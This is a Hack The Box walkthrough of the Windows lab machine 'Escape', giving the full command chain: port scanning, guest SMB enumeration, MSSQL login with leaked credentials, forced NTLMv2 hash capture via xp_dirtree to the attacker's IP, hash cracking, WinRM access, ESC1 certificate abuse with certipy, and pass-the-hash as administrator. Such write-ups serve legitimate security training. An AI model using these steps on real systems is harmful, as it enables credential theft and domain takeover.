Escape

February 28, 2025

---

Created by	Page	Difficulty	OS
Geiseric	Hack The Box	Medium	Windows

---

• The first step is to perform a scan of the open ports and then list the versions and technologies used on the open ports.

    nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.11.202 -oG scan
    /opt/extractports scan
    nmap -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49689,49690,49709,49720 -sCV -Pn 10.10.11.202 -oN ports
  

  ![[Pasted image 20250208134014.png]]

• I found the domain sequel.htb, I added it to the file in the hosts file

• When I see an open port with a dns service, I list the mail servers and find another domain that I add to the hosts file.

    dig @10.10.11.202 sequel.htb mx
  

  

• Ready the shared resources by smb with guest credentials.

    netexec smb 10.10.11.202 -u guest -p "" --shares
  

  

• Seeing that I have read permissions on the IPC$ folder, I can list the system users.

    impacket-lookupsid  sequel.htb/Guest@10.10.11.202
  

  

• As I also have read permissions on the Public folder, I connect to it and find a pdf file

    smbclient -U guest \\\\10.10.11.202\\Public
  

  

• Inside the document we find some credentials to connect to Microsoft SQL Server

  

  

• I log on and start looking for something interesting within the boards but find nothing remarkable. I also don’t have the possibility to execute system commands

    impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@10.10.11.202
  

• After checking the tables for information and not finding anything, I decide to stay on listen with reply and make a query against my ip to see the NTLMv2 hash.

EXEC master..xp_dirtree "\\10.10.14.24\share\"

• I break the hash and get to see the clear text password of the sql_svc user.

    hashcat -m 5600  hash /usr/share/wordlists/rockyou.txt --show
  

• With this user I connect to the system via winrm and after enumerating the system I find a sql server log file. Inside I find the credentials of the user Ryan.Cooper in clear text.

    evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie
  

  

  

• With this credentials I list the certificate templates. I find that with these credentials it is vulnerable to an ESC1 attack.

    certipy-ad find -u Ryan.Cooper -p NuclearMosquito3  -dc-ip 10.10.11.202 -stdout -enabled -vulnerable
  

  

• Following the steps to exploit ESC1, we can obtain a .pfx file with which we can connect to the system.

    certipy-ad req -u Ryan.Cooper@sequel.htb -p "NuclearMosquito3" -ca sequel-DC-CA -template UserAuthentication -upn administrator@sequel.htb -dc-ip 10.10.11.202
  

  

• Authenticate with the certificate to obtain the administrator’s nt hash

    certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.202
  

  

• With this hash we connect to the system and manage to read the second flag.

    evil-winrm -i 10.10.11.202 -u Administrator  -H a52f78e4c751e5f5e17e1e9f3e58f4ee